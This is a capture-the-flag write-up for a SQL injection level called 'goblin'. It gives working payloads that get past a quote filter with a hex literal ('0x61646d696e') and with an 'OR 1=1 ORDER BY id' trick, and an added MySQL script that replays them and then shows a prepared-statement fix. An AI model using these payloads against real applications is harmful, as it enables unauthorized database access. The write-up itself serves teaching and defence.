
goblin


We are provided with the SQL query:

SELECT id FROM prob_goblin WHERE id='guest' AND no={$_GET[no]}

This time the application filters quotation marks, and user input is no longer placed in the id field. The only injection point is the no parameter, which is inserted unquoted into a numeric comparison, so a payload needs no quotes at all.

The code also performs two conditional checks:

  1. if($result['id']): It checks whether the query returned a row with a non-empty id. If so, it prints the following message: Hello {$result[id]}.
  2. if($result['id'] == 'admin'): It then checks whether that id is exactly admin. If so, it prints the flag.

We want the second conditional statement to be executed.

There are two methods.

Method 1

First, to make the query return no row at all, we can provide the following URI parameter:

?no=0

The resultant query then becomes:

SELECT id FROM prob_goblin WHERE id='guest' AND no=0

No row has both id='guest' and no=0 (the guest row has a different no value), so the query returns nothing and $result['id'] is empty.


As expected, the Hello {$result[id]} message isn't printed.

In order to execute the second conditional statement, we can provide the following URI parameter:

?no=0 OR id=0x61646d696e

Because quotes are filtered, we pass admin as the hexadecimal literal 0x61646d696e. When MySQL compares a hex literal with a string column it treats the literal as the string 'admin', so no quotation marks are needed.

The resultant query will be:

SELECT id FROM prob_goblin WHERE id='guest' AND no=0 OR id=0x61646d696e

AND binds tighter than OR, so the condition reads (id='guest' AND no=0) OR id=0x61646d696e. The first part matches nothing, so the only row returned is the admin row. $result['id'] is now 'admin': the first check prints Hello admin and the second check prints the flag.


Method 2

If we provide the following URI parameter:

?no=no

The resultant query will be:

SELECT id FROM prob_goblin WHERE id='guest' AND no=no

no=no is true for every row whose no is not NULL (NULL = NULL yields NULL, not true), so this behaves like the original query: it returns the guest row, prints Hello guest, and does not print the flag.

Next, we append an OR condition and an ORDER BY clause:

?no=no OR 1=1 ORDER BY id;

The resultant query will be:

SELECT id FROM prob_goblin WHERE id='guest' AND no=no OR 1=1 ORDER BY id;

1=1 is true for every row, and anything OR true is true, so the WHERE clause now matches every row in the table. The application only looks at the first row it fetches, which is why the ORDER BY id clause matters: it sorts admin ahead of guest, the first row's id is admin, and the flag is printed. Without ORDER BY, the row order would be whatever the storage engine happens to return.
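The following MySQL script walks through both methods against a table shaped like the challenge query. It is an added example, not code from the original writeup or from the challenge itself: the table definition and the row values (guest with no=1, admin with no=2) are constructed for illustration, since the page does not show the real table contents. It also shows the hardened form, a prepared statement, and what the Method 1 payload does when it is bound as a parameter instead of spliced into the query text.

```sql
-- Added example (MySQL dialect), not part of the original writeup.
-- Table name and columns follow the challenge query; the row values
-- (guest/1, admin/2) are constructed for illustration.
CREATE TABLE prob_goblin (
  id VARCHAR(20),
  no INT
);
INSERT INTO prob_goblin (id, no) VALUES ('guest', 1), ('admin', 2);

-- 1. The intended query: exactly the guest row.
SELECT id FROM prob_goblin WHERE id='guest' AND no=1;            -- guest

-- 2. Method 1, step one: ?no=0 matches no row (guest has no=1),
--    so $result['id'] is empty and nothing is printed.
SELECT id FROM prob_goblin WHERE id='guest' AND no=0;            -- (empty)

-- 3. Method 1, step two: AND binds tighter than OR, so this reads
--    (id='guest' AND no=0) OR id=0x61646d696e. The hex literal is
--    compared with a string column, so MySQL treats it as the string
--    'admin' and the admin row is the only match.
SELECT id FROM prob_goblin WHERE id='guest' AND no=0 OR id=0x61646d696e;  -- admin
SELECT 0x61646d696e = 'admin';                                   -- 1

-- 4. Method 2, step one: no=no is true for every row whose no is not
--    NULL (NULL = NULL yields NULL), so only the guest row survives
--    the AND and Hello guest is printed.
SELECT id FROM prob_goblin WHERE id='guest' AND no=no;           -- guest

-- 5. Method 2, step two: OR 1=1 matches every row. The application
--    reads only the first row it fetches, and ORDER BY id sorts
--    'admin' before 'guest', so that first row is the admin row.
SELECT id FROM prob_goblin WHERE id='guest' AND no=no OR 1=1 ORDER BY id;  -- admin, then guest

-- 6. Hardened form: bind no as a parameter instead of splicing it in.
--    The column is an integer, so the bound string is coerced
--    numerically and the whole payload collapses to 0; no row matches
--    and the OR clause never becomes part of the SQL.
PREPARE stmt FROM 'SELECT id FROM prob_goblin WHERE id=''guest'' AND no=?';
SET @no = '0 OR id=0x61646d696e';
EXECUTE stmt USING @no;                                          -- (empty, with a truncation warning)
DEALLOCATE PREPARE stmt;
```

Step 3 is the one to remember when a filter strips quotes: any string comparison in MySQL can be rewritten with a hex literal, so blocking quotation marks does not stop string injection, only parameter binding (or a strict integer cast of no in the application) does.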
